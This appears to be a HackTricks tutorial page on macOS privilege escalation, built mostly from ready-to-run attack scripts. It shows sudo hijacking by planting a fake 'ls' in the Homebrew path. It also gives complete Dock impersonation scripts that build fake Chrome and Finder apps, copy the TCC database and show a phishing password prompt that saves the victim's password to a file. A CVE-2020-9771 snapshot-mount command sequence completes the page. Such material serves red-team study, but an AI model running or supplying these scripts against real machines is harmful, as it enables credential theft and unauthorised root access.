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{% endhint %} ## TCC Privilege Escalation If you came here looking for TCC privilege escalation go to: {% content-ref url="macos-security-protections/macos-tcc/" %} [macos-tcc](macos-security-protections/macos-tcc/) {% endcontent-ref %} ## Linux Privesc Please note that **most of the tricks about privilege escalation affecting Linux/Unix will affect also MacOS** machines. So see: {% content-ref url="../../linux-hardening/privilege-escalation/" %} [privilege-escalation](../../linux-hardening/privilege-escalation/) {% endcontent-ref %} ## User Interaction ### Sudo Hijacking You can find the original [Sudo Hijacking technique inside the Linux Privilege Escalation post](../../linux-hardening/privilege-escalation/#sudo-hijacking). However, macOS **maintains** the user's **`PATH`** when he executes **`sudo`**. Which means that another way to achieve this attack would be to **hijack other binaries** that the victim sill execute when **running sudo:** ```bash # Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH cat > /opt/homebrew/bin/ls < /tmp/privesc fi /bin/ls "\$@" EOF chmod +x /opt/homebrew/bin/ls # victim sudo ls ``` Note that a user that uses the terminal will highly probable have **Homebrew installed**. So it's possible to hijack binaries in **`/opt/homebrew/bin`**. ### Dock Impersonation Using some **social engineering** you could **impersonate for example Google Chrome** inside the dock and actually execute your own script: {% tabs %} {% tab title="Chrome Impersonation" %} Some suggestions: * Check in the Dock if there is a Chrome, and in that case **remove** that entry and **add** the **fake** **Chrome entry in the same position** in the Dock array. ```bash #!/bin/sh # THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON) # If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%'; rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null # Create App structure mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS mkdir -p /tmp/Google\ Chrome.app/Contents/Resources # Payload to execute cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c < #include #include int main() { char *cmd = "open /Applications/Google\\\\ Chrome.app & " "sleep 2; " "osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; " "PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); " "echo \$PASSWORD > /tmp/passwd.txt"; system(cmd); return 0; } EOF gcc /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c -o /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome rm -rf /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome # Info.plist cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist CFBundleExecutable Google Chrome CFBundleIdentifier com.google.Chrome CFBundleName Google Chrome CFBundleVersion 1.0 CFBundleShortVersionString 1.0 CFBundleInfoDictionaryVersion 6.0 CFBundlePackageType APPL CFBundleIconFile app EOF # Copy icon from Google Chrome cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns # Add to Dock defaults write com.apple.dock persistent-apps -array-add 'tile-datafile-data_CFURLString/tmp/Google Chrome.app_CFURLStringType0' sleep 0.1 killall Dock ``` {% endtab %} {% tab title="Finder Impersonation" %} Some suggestions: * You **cannot remove Finder from the Dock**, so if you are going to add it to the Dock, you could put the fake Finder just next to the real one. For this you need to **add the fake Finder entry at the beginning of the Dock array**. * Another option is to not place it in the Dock and just open it, "Finder asking to control Finder" is not that weird. * Another options to **escalate to root without asking** the password with a horrible box, is make Finder really ask for the password to perform a privileged action: * Ask Finder to copy to **`/etc/pam.d`** a new **`sudo`** file (The prompt asking for the password will indicate that "Finder wants to copy sudo") * Ask Finder to copy a new **Authorization Plugin** (You could control the file name so the prompt asking for the password will indicate that "Finder wants to copy Finder.bundle") ```bash #!/bin/sh # THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON) # If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%'; rm -rf /tmp/Finder.app/ 2>/dev/null # Create App structure mkdir -p /tmp/Finder.app/Contents/MacOS mkdir -p /tmp/Finder.app/Contents/Resources # Payload to execute cat > /tmp/Finder.app/Contents/MacOS/Finder.c < #include #include int main() { char *cmd = "open /System/Library/CoreServices/Finder.app & " "sleep 2; " "osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; " "PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); " "echo \$PASSWORD > /tmp/passwd.txt"; system(cmd); return 0; } EOF gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder rm -rf /tmp/Finder.app/Contents/MacOS/Finder.c chmod +x /tmp/Finder.app/Contents/MacOS/Finder # Info.plist cat << EOF > /tmp/Finder.app/Contents/Info.plist CFBundleExecutable Finder CFBundleIdentifier com.apple.finder CFBundleName Finder CFBundleVersion 1.0 CFBundleShortVersionString 1.0 CFBundleInfoDictionaryVersion 6.0 CFBundlePackageType APPL CFBundleIconFile app EOF # Copy icon from Finder cp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns # Add to Dock defaults write com.apple.dock persistent-apps -array-add 'tile-datafile-data_CFURLString/tmp/Finder.app_CFURLStringType0' sleep 0.1 killall Dock ``` {% endtab %} {% endtabs %} ## TCC - Root Privilege Escalation ### CVE-2020-9771 - mount\_apfs TCC bypass and privilege escalation **Any user** (even unprivileged ones) can create and mount a time machine snapshot an **access ALL the files** of that snapshot.\ The **only privileged** needed is for the application used (like `Terminal`) to have **Full Disk Access** (FDA) access (`kTCCServiceSystemPolicyAllfiles`) which need to be granted by an admin. {% code overflow="wrap" %} ```bash # Create snapshot tmutil localsnapshot # List snapshots tmutil listlocalsnapshots / Snapshots for disk /: com.apple.TimeMachine.2023-05-29-001751.local # Generate folder to mount it cd /tmp # I didn it from this folder mkdir /tmp/snap # Mount it, "noowners" will mount the folder so the current user can access everything /sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap # Access it ls /tmp/snap/Users/admin_user # This will work ``` {% endcode %} A more detailed explanation can be [**found in the original report**](https://theevilbit.github.io/posts/cve\_2020\_9771/)**.** ## Sensitive Information This can be useful to escalate privileges: {% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %} [macos-sensitive-locations.md](macos-files-folders-and-binaries/macos-sensitive-locations.md) {% endcontent-ref %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
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